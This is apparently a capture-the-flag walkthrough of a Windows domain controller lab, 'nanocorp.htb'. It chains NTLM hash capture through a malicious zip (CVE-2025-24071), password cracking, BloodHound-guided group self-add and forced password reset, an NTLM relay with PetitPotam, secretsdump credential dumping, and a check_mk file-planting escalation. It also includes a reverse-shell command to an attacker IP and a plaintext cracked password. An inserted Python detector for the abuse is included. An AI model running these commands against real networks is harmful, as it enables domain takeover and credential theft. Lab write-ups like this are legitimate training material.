Basic information

Port scan

Port 80 plus the usual Windows domain ports:

$ nmap -sC -sV -Pn 10.10.11.93
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-15 13:24 JST
Nmap scan report for 10.10.11.93
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://nanocorp.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-15 10:57:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Not valid before: 2025-04-06T22:58:43
|_Not valid after: 2026-04-06T23:18:43
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-11-15T10:57:48
|_ start_date: N/A
|_clock-skew: 6h31m38s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.48 seconds

80

A hosts entry needs to be added:

10.10.11.93 nanocorp.htb

A corporate website:

hire

Under About us there is a job-application page on the hire subdomain; after adding it to hosts, it turns out to be a resume upload page that only accepts zip files:

CVE-2025-24071

A search turns up a fairly recent Windows zip-related vulnerability:

sudo python3 Responder.py -i 10.10.14.2 -v

Generate the malicious zip, upload it, and catch the web_svc authentication:

Crack the password the usual way:

sudo hashcat -m 5600 hash.txt ~/Tools/dict/rockyou.txt

dksehdgh712!@#

bloodhound

Now that we have an account, start with the usual BloodHound collection and analysis:

sudo sntp -sS 10.10.11.93

# hosts
10.10.11.93 nanocorp.htb hire.nanocorp.htb dc01.nanocorp.htb dc01

bloodhound-python -u web_svc -p 'dksehdgh712!@#' -c All -d nanocorp.htb -ns 10.10.11.93 --zip

There is a very obvious path: web_svc has AddSelf on the IT_SUPPORT group, IT_SUPPORT has ForceChangePassword over MONITORING_SVC, and MONITORING_SVC is in Remote Management, so it can log in over WinRM:

web_svc to monitoring_svc

So follow that path step by step. First, add ourselves to the IT_SUPPORT group:

bloodyAD --host dc01.nanocorp.htb -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' -k add groupMember IT_SUPPORT web_svc

Then force-change monitoring_svc's password:

bloodyAD --host dc01.nanocorp.htb -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' -k set password monitoring_svc 'Miao@123'

user flag

After changing the password, log in as monitoring_svc over WinRM:

python3 winrmexec.py -ssl -port 5986 NANOCORP.HTB/monitoring_svc:'Miao@123'@dc01.nanocorp.htb -k
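From the defender's side, the two bloodyAD steps above leave a clear trace in the DC's Security log: a group-membership event where the actor added themselves (the AddSelf ACE being exercised) followed by a password reset by that same actor (the ForceChangePassword step). The detector below is an added example, not part of the original writeup; it assumes events have already been flattened into key=value lines with the real Windows field names, and the sample events are constructed.

```python
import re
from typing import Dict, List

# Constructed sample of DC Security-log events in a flattened key=value form
# (field names mirror the real Windows event fields). Real logs would come
# from EVTX/XML or a SIEM export. Event IDs: 4728/4732/4756 = member added to
# a security-enabled group (global/local/universal); 4724 = password reset.
SAMPLE_EVENTS = [
    "EventID=4728 SubjectUserName=web_svc MemberName=CN=web_svc,CN=Users,DC=nanocorp,DC=htb TargetUserName=IT_SUPPORT",
    "EventID=4724 SubjectUserName=web_svc TargetUserName=monitoring_svc",
    "EventID=4728 SubjectUserName=Administrator MemberName=CN=alice,CN=Users,DC=nanocorp,DC=htb TargetUserName=IT_SUPPORT",
    "EventID=4724 SubjectUserName=helpdesk1 TargetUserName=bob",
]

GROUP_ADD_EVENTS = {"4728", "4732", "4756"}
PASSWORD_RESET_EVENT = "4724"


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened key=value line into a dict of event fields."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def member_cn(member_name: str) -> str:
    """Pull the leading CN out of a DN such as CN=web_svc,CN=Users,DC=..."""
    m = re.match(r"CN=([^,]+)", member_name, re.IGNORECASE)
    return m.group(1).lower() if m else member_name.lower()


def analyze(lines: List[str]) -> List[str]:
    """Flag self-adds to a group and password resets by the same actor afterwards.

    Returns human-readable findings in log order. Normal admin-driven group
    changes and helpdesk resets (no preceding self-add) are not flagged.
    """
    findings: List[str] = []
    self_adders = set()
    for line in lines:
        ev = parse_event(line)
        actor = ev.get("SubjectUserName", "").lower()
        if ev.get("EventID") in GROUP_ADD_EVENTS and member_cn(ev.get("MemberName", "")) == actor:
            self_adders.add(actor)
            findings.append(f"SELF_ADD {actor} -> {ev.get('TargetUserName')}")
        elif ev.get("EventID") == PASSWORD_RESET_EVENT and actor in self_adders:
            findings.append(f"RESET_AFTER_SELF_ADD {actor} -> {ev.get('TargetUserName')}")
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The underlying fix is to remove the AddSelf and ForceChangePassword ACEs BloodHound surfaced; the detector only catches the path being walked.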

Unintended: Relay to root

Because web_svc can become a member of IT_SUPPORT, and IT_SUPPORT can add DNS records, we can relay directly:

# add dns record
python3 dnstool.py -u 'nanocorp.htb\WEB_SVC' -p 'dksehdgh712!@#' nanocorp.htb -dc-ip 10.10.11.93 -dns-ip 10.10.11.93 -a add -d 10.10.14.2 -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'

# impacket ntlmrelayx
python3 examples/ntlmrelayx.py -smb2support -t winrms://10.10.11.93 -i

# force authentication
python3 PetitPotam.py -u web_svc -p 'dksehdgh712!@#' -d nanocorp.htb 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' dc01

hashdump

Then just add web_svc to Domain Admins and dump:

python3 examples/secretsdump.py  'nanocorp.htb/WEB_SVC':'dksehdgh712!@#'@dc01.nanocorp.htb -just-dc-ntlm


Intended: check_mk

Routine enumeration finds a check_mk service, version 2.1, which has a known vulnerability:

Roughly: every time the repair program runs, it executes a cmd file from a directory whose name is tied to the PID, and that directory is writable by us.

But the server has antivirus, so we need to build our own executable to run:

As for the repair program's PID range, the article gives 10000-30000, but repeated testing on this machine shows it stays below 10000.

In addition, the C:\windows\temp directory is the same; you need runas to switch to the web_svc account to access it, since monitoring_svc has no permission:

.\runascs.exe web_svc "dksehdgh712!@#" powershell -r 10.10.14.2:4445

Then drop the malicious file in every possible location and run the repair program to trigger it:

0..10000 | ? { $_ % 4 -eq 0 } | foreach {Set-Content -Path C:\Windows\Temp\cmk_all_${_}_1.cmd -Value "\windows\temp\shell.exe" -Encoding Default -Force;Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;}

ls C:\Windows\Installer\*.msi | foreach { msiexec /fa $_ }

References